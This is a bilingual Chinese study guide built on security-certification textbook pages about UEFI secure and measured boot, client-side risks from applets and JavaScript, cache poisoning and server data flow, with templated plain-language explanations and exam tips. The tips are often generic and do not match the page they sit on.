Boot attestation or secure boot is a feature of UEFI that aims to protect the local OS by preventing the loading or installing of device drivers or an OS that is not signed by a preapproved digital certificate. Secure boot thus protects systems against a range of low-level or boot-level malware, such as certain rootkits and backdoors. Secure boot intends that only drivers and OSs that pass attestation (the verification and approval process accomplished through the validation of a digital signature) are allowed to be installed and loaded on

中文直译 / 整理

许多硬件设备,例如打印机和调制解调器,需要一组有限的指令和处理能力来 完成其任务,同时尽量减轻操作系统本身的负担。 在许多情况下,这些“微型” 操作系统完全包含在为它们服务的设备上的固件芯片中。 许多设备通常将固件 作为其主要操作系统使用,包括移动设备、物联网(IoT)设备、边缘计算设 备、雾计算设备和工业控制系统。 基本输入/输出系统(BIOS)是嵌入在主板EEPROM或闪存芯片中的传统基础 低级固件或软件。 BIOS包含计算机启动并从磁盘加载操作系统所需的与操作系 统无关的原始指令。 BIOS会识别并初始化基本系统硬件组件,例如硬盘、光驱 和显卡,以便启动加载操作系统的流程能够开始。 在大多数现代系统中, BIOS已被UEFI取代。 统一可扩展固件接口(UEFI)提供了与BIOS相同的所有功能,并有许多改 进,例如支持更大的硬盘(尤其是用于启动)、更快的启动时间、增强的安全 功能,甚至可以在进行系统更改时使用鼠标(BIOS仅限键盘控制)。 UEFI还 包含CPU独立架构、支持网络的灵活预操作系统环境、度量启动、启动认证 (即安全启动)以及向后和向前兼容性。

它还运行CPU独立的驱动程序(用于 系统组件、驱动控制器和硬盘)。 更新UEFI、BIOS或固件的过程称为刷写。 如果恶意行为者或恶意软件能够更 改系统的UEFI、BIOS或固件,他们可能绕过安全功能或启动其他被禁止的活 动。 已有若干实例表明,恶意代码已嵌入到UEFI、BIOS或固件中。 此外,还 有一种称为phlashing的攻击,即安装恶意版本的官方BIOS或固件,从而在设 备中引入远程控制或其他恶意功能。 启动验证或安全启动是UEFI的一项功能,旨在通过阻止加载或安装未经过预批 准数字证书签名的设备驱动程序或操作系统来保护本地操作系统。 因此,安全 启动可防止系统受到各种低级别或启动级别恶意软件的侵害,例如某些根套件 和后门。 安全启动旨在仅允许通过验证(通过验证数字签名完成的验证和批准 过程)的驱动程序和操作系统安装和加载于

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

程序:程序是一步一步怎么做。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

数字证书:数字证书把身份和公钥绑定起来,由可信 CA 签发。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 571 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Step-by-step、SOP 常对应 procedure。

签名支持完整性、真实性和不可否认性,不等于加密全文。

证书不是密钥本身,而是身份与公钥的可信绑定。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
程序 程序是一步一步怎么做。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 29 / PDF P572

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

the local system. Unfortunately, there are now forms of malware which can bypass or abuse UEFI security features on specific systems. Measured boot is an optional feature of UEFI that takes a hash calculation of every element involved in the booting process. The hashes are performed by and stored in the Trusted Platform Module (TPM). If foul play is detected in regard to booting, the hashes of the most recent boot can be accessed and compared against known-good values to determine which (if any) of the boot components have been compromised. Measured boot does not interrupt or stop the process of booting; it just records the hash IDs of the elements used in the boot.

Thus, it is like a security camera. It does not prevent a malicious action; it just records whatever occurs in its area of view. Client-Based Systems Client-based vulnerabilities place the user, their data, and their system at risk of compromise and destruction. A client-side attack is any attack that is able to harm a client. Generally, when attacks are discussed, it's assumed that the primary target is a server or a server-side component. A client-side or clientfocused attack is one where the client itself, or a process on the client, is the target.

A common example of a client-side attack is a malicious website that transfers malicious mobile code (such as an applet) to a vulnerable browser running on the client. Client-side attacks can occur over any communications protocol, not just Hypertext Transfer Protocol (HTTP). Another potential vulnerability that is client-based is the risk of poisoning of local caches. Mobile Code Applets are code objects sent from a server to a client to perform some action. In fact, applets are actually self-contained miniature programs that execute independently of the server that sent them—that is, mobile code. The arena of the web is undergoing constant flux.

The use of applets is not as common today as it was in the early 2010s. However, applets are not absent from the web, and many browsers still support them (or still have add-ons present that support them). Thus, even when your organization does not intentionally use applets in your internal or public web design, your web browsers could encounter them while surfing the public web. Imagine a web server that offers a variety of financial tools to web users. One of these tools might be a mortgage calculator that processes a user's financial information and provides a monthly mortgage payment based on the loan's

中文直译 / 整理

本地系统。 然而,目前存在一些恶意软件能够绕过或滥用特定系统上的UEFI安 全功能。 测量启动是UEFI的一项可选功能,它会对启动过程中涉及的每个元素进行哈 希计算。 这些哈希值由可信平台模块(TPM)执行并存储。 如果检测到启动过 程中存在恶意行为,可以访问并比较最近一次启动的哈希值与已知的正常值, 以确定哪些(如果有)启动组件已被破坏。 测量启动不会中断或阻止启动过程; 它只是记录启动过程中使用的元素的哈希ID。 因此,它就像一台安全摄像头: 它不会阻止恶意行为,只是记录其监控范围内发生的所有情况。 基于客户端的系统 基于客户端的漏洞会使用户、其数据和其系统面临被破坏和摧毁的风险。 客户 端攻击是指任何能够对客户端造成损害的攻击。 通常,在讨论攻击时,人们默 认主要目标是服务器或服务器端组件。 而客户端攻击或以客户端为中心的攻击, 则是以客户端本身或客户端上的某个进程为目标的攻击。 一个常见的客户端攻 击示例是恶意网站向运行在客户端上的易受攻击的浏览器传输恶意移动代码 (例如小应用程序)。 客户端攻击可以通过任何通信协议发生,而不仅仅是超 文本传输协议(HTTP)。 另一个潜在的基于客户端的漏洞是本地缓存被污染 的风险。

移动代码 Applets 是从服务器发送到客户端以执行某些操作的代码对象。 事实上, Applets 实际上是独立于发送它们的服务器运行的自包含微型程序——即移动代 码。 网络领域正在不断变化。 如今,Applets 的使用不如 2010 年代初期普遍。 然而,Applets 并未从网络中消失,许多浏览器仍支持它们(或仍具有支持它 们的插件)。 因此,即使您的组织在内部或公共网页设计中并未有意使用 Applets,您的网页浏览器在浏览公共网络时仍可能遇到它们。 想象一个为网页用户提供多种金融工具的Web服务器。 其中一个工具可能是一 个按揭计算器,它会处理用户的财务信息,并根据贷款的

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

检测是 IDS,主动阻断更像 IPS。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 30 / PDF P573

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

principal and term and the borrower's credit information. Instead of processing this data and returning the results to the client system, the remote web server might send an applet to the local system that enables it to perform those calculations itself. This provides a number of benefits to both the remote server and the end user: The processing burden is shifted to the client, freeing up resources on the web server to process requests from more users. The client is able to produce data using local resources rather than waiting for a response from the remote server. In many cases, this results in a quicker response to changes in the input data.

In a properly programmed applet, the web server does not receive any data provided to the applet as input, therefore maintaining the security and privacy of the user's financial data. However, applets introduce security concerns. Any time you execute someone else's code, you are at risk of the code being malicious or having exploitable flaws. Security administrators must take steps to ensure that code sent to systems on their network is safe and properly screened for malicious activity. Also, unless the code is analyzed line by line, the end user can never be certain that the applet doesn't contain a Trojan horse, backdoor, rootkit, ransomware, or some other malware component.

For example, the mortgage calculator might indeed transmit sensitive financial information to the web server without the end user's knowledge or consent. Two historical examples of applet types are Java applets and ActiveX controls. Java is a platform-independent programming language developed by Sun Microsystems (now owned by Oracle). ActiveX controls were Microsoft's response to Sun's Java. Java is still in use for internal development and business software, but its use on the Internet is rare. ActiveX is now a legacy technology and is both EOL and EOS. It was only supported by internet Explorer.

Most modern internet-capable systems no longer support these applet forms, but it is important to ensure that before assuming a system is secure. JavaScript is the most widely used web scripting language in the world and is embedded into (included inside of) HTML documents using <script> </script> enclosure tags. JavaScript is usually dependent on its HTML host document, but it can operate as a stand-alone script file (both client-side and server-side). However, it is generally not considered an applet—it is usually

中文直译 / 整理

本金和期限以及借款人的信用信息,计算出每月的按揭还款额。 与在服务器端 处理这些数据并将结果返回给客户端系统不同,远程Web服务器可能会向本地 系统发送一个小应用程序,使其能够自行执行这些计算。 这为远程服务器和最 终用户都带来了诸多好处: 处理负担被转移到客户端,从而释放了Web服务器的资源,以处理更多用 户的请求。 客户端能够使用本地资源生成数据,而无需等待远程服务器的响应。 在许多情况下,这使得对输入数据变化的响应更加迅速。 在正确编程的小程序中,Web服务器不会接收任何提供给小程序的输入 数据,因此保障了用户财务数据的安全性和隐私性。 然而,小程序会带来安全问题。 每次执行他人的代码时,都存在代码恶意 或存在可利用漏洞的风险。 安全管理员必须采取措施,确保发送到其网络系统 的代码是安全的,并经过了对恶意活动的严格筛查。 此外,除非逐行分析代码, 否则最终用户永远无法确定小程序是否包含特洛伊木马、后门、rootkit、勒索 软件或其他恶意软件组件。 例如,按揭计算器可能会在最终用户不知情或未经 同意的情况下,将敏感的财务信息传输到Web服务器。 小程序类型的两个历史示例是 Java 小程序和 ActiveX 控件。

Java 是由 Sun Microsystems(现归 Oracle 所有)开发的平台无关编程语言。 ActiveX 控件 是微软对 Sun 的 Java 的回应。 Java 仍用于内部开发和商业软件,但在互联网 上的使用已非常罕见。 ActiveX 现已成为遗留技术,既已停止支持(EOL)也 已终止服务(EOS),仅由 Internet Explorer 支持。 大多数现代具备互联网 功能的系统已不再支持这些小程序形式,但在假设系统安全之前,确保这一点 仍然重要。 JavaScript 是全球使用最广泛的网页脚本语言,通过 < > < > script/script 标记嵌 入(包含在)HTML 文档中。 JavaScript 通常依赖于其 HTML 主文档,但也可以作为独立 的脚本文件运行(客户端和服务器端)。 然而,它通常不被视为小程序——它通常是

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 31 / PDF P574

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

embedded code. It is automatically downloaded along with the primary web documents from most web servers you access. JavaScript enables dynamic web pages and supports web applications as well as a plethora of client-side activities and page behaviors. Most browsers support JavaScript via a dedicated JavaScript engine. Most of the implementations use sandbox isolation to restrict JavaScript to webrelated activities while minimizing its ability to perform general-purpose programming tasks. Also, most browsers default to enforcing the same-origin policy. The same-origin policy prohibits JavaScript code from accessing content from another origin.

The origin is typically defined by a combination of protocol (i.e., HTTP versus HTTPS), domain/IP address, and port number. If other content has any one of these origin elements different from the origin of the JavaScript code, the code will be blocked from accessing that content. However, there are ways of abusing JavaScript. Threat actors can create believable fake websites that look and act like a valid site, including duplicating the JavaScript dynamic elements. But since the JavaScript code is in the HTML document sent to the browser, a malicious actor could alter that code to perform harmful actions, such as copying or cloning credentials and distributing them to the attacker.

Threat actors have also found means to breach the sandbox isolation and even violate same-original policies from time to time, so JavaScript should be considered a threat. Whenever you allow code from an unknown and thus untrusted source to execute on your system, you are putting your system at risk of compromise. XSS and XSRF/CSRF exploit methods can be used to compromise JavaScript support in browsers. Here are some responses to these risks: Keep browsers updated (client side). Implement secure JavaScript subsets/libraries (server side).

Use a content security policy (CSP) that attempts to rigidly enforce sameorigin restrictions for most browser-side active technologies (integrated into browsers and referenced by HTML header values). As with most web applications, insertion attacks are common, so watch out for the injection of odd or abusive JavaScript code in the input being received by a web server.

中文直译 / 整理

嵌入式代码。 它会随着您访问的大多数网页服务器上的主要网页文档自动下 载。 JavaScript 能够实现动态网页,支持网页应用以及大量的客户端活动和 页面行为。 大多数浏览器通过专用的JavaScript引擎支持JavaScript。 大多数实现使用沙 箱隔离来限制JavaScript仅用于与网页相关的活动,同时最大限度地减少其执 行通用编程任务的能力。 此外,大多数浏览器默认强制执行同源策略。 同源策 略禁止JavaScript代码访问来自其他源的内容。 源通常由协议(即HTTP与 HTTPS)、域名/IP地址和端口号的组合定义。 如果其他内容的任何一个源元 素与JavaScript代码的源不同,则该代码将被阻止访问该内容。 然而,存在滥用JavaScript的方式。 威胁行为者可以创建看似和行为都像合法 网站的虚假网站,包括复制JavaScript动态元素。 但由于JavaScript代码位于 发送到浏览器的HTML文档中,恶意行为者可以修改该代码以执行有害操作, 例如复制或克隆凭据并将其分发给攻击者。 威胁行为者还找到了破坏沙箱隔离 甚至偶尔违反同源策略的方法,因此应将JavaScript视为一种威胁。

每当您允 许来自未知且因此不可信来源的代码在您的系统上执行时,您的系统都会面临 被入侵的风险。 XSS和XSRF/CSRF攻击方法可用于破坏浏览器中的 JavaScript支持。 以下是针对这些风险的一些应对措施: 保持浏览器更新(客户端)。 实施安全的 JavaScript 子集/库(服务器端)。 使用内容安全策略(CSP),力求严格限制大多数浏览器端主动技术的同 源策略(集成在浏览器中,并通过 HTML 头部值引用)。 与大多数Web应用程序一样,插入攻击很常见,因此请注意Web服务器接收的 输入中可能注入的异常或恶意JavaScript代码。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
注入攻击 注入攻击把恶意输入当命令或查询执行。
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
学习单元 32 / PDF P575

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

As a client, you may gain some benefit by being behind a web application firewall (WAF) or next-generation firewall (NGFW). We do not recommend deactivating JavaScript outright—that would cause most of the web to stop functioning in your browser. Instead, the use of security-focused add-ons, browser helper objects (BHOs), and extensions may reduce the risk of JavaScript. However, the use of add-ons and extensions can also put your system at greater risks to other threats.

For more on web-related vulnerabilities, attacks, and countermeasures, see Chapter 21, “Malicious Code and Application Attacks.” Local Caches There are many types of local caches, including DNS cache, ARP cache, and temporary internet files. See Chapter 11 for details about DNS cache and ARP cache abuses. Temporary internet files or the internet files cache is the temporary storage of files downloaded from Internet sites that are being held by the client's utility (typically a browser) for current and possibly future use. This cache mostly contains website content, but other Internet services can also use a file cache.

A variety of exploitations, such as the split-response attack, can cause the client to download content that was not an intended element of a requested web page and store it in the cache. DOM XSS may be able to access and use locally cached files to execute malicious code or exfiltrate data (see Chapter 21). Mobile code scripting attacks could also be used to plant false content in the cache. Once files have been poisoned in the cache, then even when a legitimate web document calls on a cached item, the malicious item will be activated. Client utilities should be managing the local files cache, but those utilities might not always be doing the best job.

Often, the defaults are for efficiency and performance, not for security. Consider reconfiguring the cache to only retain files for a short period of time, minimize the cache size, and deactivate the preloading of content. Keep in mind that these changes can reduce browsing performance when on slower or high-latency connections. You may want to configure the browser to delete all cookies and cache upon exit. Although you can typically perform a manual cache wipe, you would have to remember to do that. Another option is to use an automated tool that can be configured to wipe temporary Internet files on a schedule or upon a targeted program close.

中文直译 / 整理

作为客户端,您可能通过位于Web应用防火墙(WAF)或下一代防火墙( NGFW)之后获得某些好处。 我们不建议完全禁用JavaScript——这会导致 您的浏览器中大部分网页无法正常运行。 相反,使用以安全为重点的附加组 件、浏览器辅助对象(BHO)和扩展程序可以降低JavaScript的风险。 然而, 使用附加组件和扩展程序也可能使您的系统面临其他威胁的更大风险。 有关与Web相关的漏洞、攻击和对策的更多信息,请参见第21章,“恶意代码 与应用攻击。 ” 本地缓存 本地缓存有多种类型,包括DNS缓存、ARP缓存和临时互联网文件。 有关 DNS缓存和ARP缓存滥用的详细信息,请参见第11章。 临时互联网文件或互联网文件缓存是客户端工具(通常是浏览器)为当前 及可能的未来使用而临时存储的从互联网站点下载的文件。 此缓存主要包含网 站内容,但其他互联网服务也可使用文件缓存。 各种利用方式,例如拆分响应 攻击,可能导致客户端下载并非所请求网页预期组成部分的内容,并将其存储 在缓存中。 DOM XSS可能能够访问并使用本地缓存的文件来执行恶意代码或窃 取数据(见第21章)。 移动代码脚本攻击也可用于在缓存中植入虚假内容。

一 旦缓存中的文件被污染,即使合法的网页文档调用缓存项,恶意项也会被激活。 客户端工具应管理本地文件缓存,但这些工具并不总能发挥最佳作用。 通常, 默认设置是为了效率和性能,而非安全性。 建议重新配置缓存,仅保留文件较 短时间、缩小缓存大小,并禁用内容预加载。 请注意,这些更改在慢速或高延 迟连接下可能会降低浏览性能。 您可能希望将浏览器配置为在退出时删除所有 Cookie 和缓存。 虽然通常可以手动清理缓存,但您必须记得执行此操作。 另 一种选择是使用自动化工具,该工具可配置为按计划或在特定程序关闭时清除 临时 Internet 文件。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

跨站脚本 XSS:XSS 把脚本注入到网页,让浏览器执行。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

输出编码、输入验证、CSP 可降低 XSS 风险。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 33 / PDF P576

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Additional coverage of client-based endpoint security concerns is in Chapter 11. Server-Based Systems An important area of server-based concern, which may include clients as well, is the issue of data flow control. Data flow is the movement of data between processes, between devices, across a network, or over communication channels. Management of data flow ensures not only efficient transmission with minimal delays or latency, but also reliable throughput using hashing and confidentiality protection with encryption.

Data flow control also ensures that receiving systems are not overloaded with traffic, especially to the point of dropping connections or being subject to a malicious or even self-inflicted denial of service. When data overflow occurs, data may be lost or corrupted or may trigger a need for retransmission. These results are undesirable, and data flow control is often implemented to prevent these issues from occurring. Data flow control may be provided by networking devices, including routers and switches, as well as network applications and services. A load balancer spreads or distributes network traffic load across several network links or devices.

A load balancer may be able to provide more control over data flow. The purpose of load balancing is to obtain more optimal infrastructure utilization, minimize response time, maximize throughput, reduce overloading, and eliminate bottlenecks. Although load balancing can be used in a variety of situations, a common implementation is spreading a load across multiple members of a server farm or cluster. A load balancer might use a variety of techniques to perform load distribution, including random choice, round robin, load/utilization monitoring, and preferencing. See Chapter 12, “Secure Communications and Network Attacks,” for more on load balancing.

A denial-of-service (DoS) attack can severely deter data flow control. It is important to monitor for DoS attacks and implement mitigations. See Chapter 17, “Preventing and Responding to Incidents,” for a discussion of these attacks and potential defenses. For more on server protections, see Chapter 18. Large-Scale Parallel Data Systems

中文直译 / 整理

有关基于客户端的终端安全问题的更多内容见第 11 章。 基于服务器的系统 服务器相关的一个重要领域,可能包括客户端在内,是数据流控制问题。 数据 流是指数据在进程之间、设备之间、网络上或通信信道间的移动。 数据流管理 不仅确保高效传输,最大限度减少延迟,还通过哈希和加密实现可靠吞吐量和 机密性保护。 数据流控制还确保接收系统不会因流量过载而崩溃,特别是避免 连接中断或遭受恶意甚至自引发的拒绝服务攻击。 当数据溢出发生时,数据可 能丢失、损坏,或触发重传需求。 这些结果都是不可取的,因此通常会实施数 据流控制以防止此类问题。 数据流控制可由网络设备(包括路由器和交换机) 以及网络应用程序和服务提供。 一个负载均衡器将网络流量负载分散到多个网络链路或设备上。 负载均衡器可 能能够对数据流提供更精细的控制。 负载均衡的目的是实现更优的基础设施利 用率、最小化响应时间、最大化吞吐量、减少过载并消除瓶颈。 尽管负载均衡 可用于多种场景,但常见的实现方式是将负载分散到服务器集群或服务器农场 的多个成员中。 负载均衡器可能采用多种技术执行负载分配,包括随机选择、 轮询、负载/利用率监控和优先级设置。

有关负载均衡的更多内容,请参阅第 12章“安全通信与网络攻击”。 拒绝服务(DoS)攻击会严重阻碍数据流控制。 必须监控DoS攻击并实施 缓解措施。 请参阅第17章“事件的预防与响应”,了解有关这些攻击及潜 在防御措施的讨论。 有关服务器保护的更多信息,请参阅第18章。 大规模并行数据系统

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 34 / PDF P577

第 577 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Parallel data systems or parallel computing is a computation system designed to perform numerous calculations simultaneously. However, parallel data systems often go far beyond basic multiprocessing capabilities. They often include the concept of dividing up a large task into smaller elements, and then distributing each subelement to a different processing subsystem for parallel computation. This implementation is based on the idea that some problems can be solved efficiently if broken into smaller tasks that can be worked on concurrently. Parallel data processing can be accomplished by using distinct CPUs or multicore CPUs, virtual systems, or any combination of these.

Large-scale parallel data systems must also be concerned with performance, power consumption, and reliability/stability issues. Within the arena of multiprocessing or parallel processing there are several divisions. The first division is between symmetric multiprocessing (SMP) and asymmetric multiprocessing (AMP). The scenario where a single computer contains multiple processors that are treated equally and controlled by a single OS is called symmetric multiprocessing (SMP). In SMP, processors share not only a common OS but also a common data bus and memory resources. In this type of arrangement, systems may use a large number of processors.

The collection of processors works collectively on a single or primary task, code, or project. In asymmetric multiprocessing (AMP), the processors are often operating independently of one another. Usually, each processor has its own OS and/or task instruction set, as well as a dedicated data bus and memory resources. Under AMP, processors can be configured to execute only specific code or operate on specific tasks (or specific code or tasks are allowed to run only on specific processors; this might be called affinity in some circumstances).

A variation of AMP is massive parallel processing (MPP), where numerous AMP systems are linked together to work on a single primary task across multiple processes in multiple linked systems. Some computationally intensive operations, such as those that support the research of scientists and mathematicians, require more processing power than a single OS can deliver. MPP may best serve such operations. MPP systems house hundreds or even thousands of processors, each of which has its own OS and memory/bus resources. Some MPPs have over 10 million execution cores.

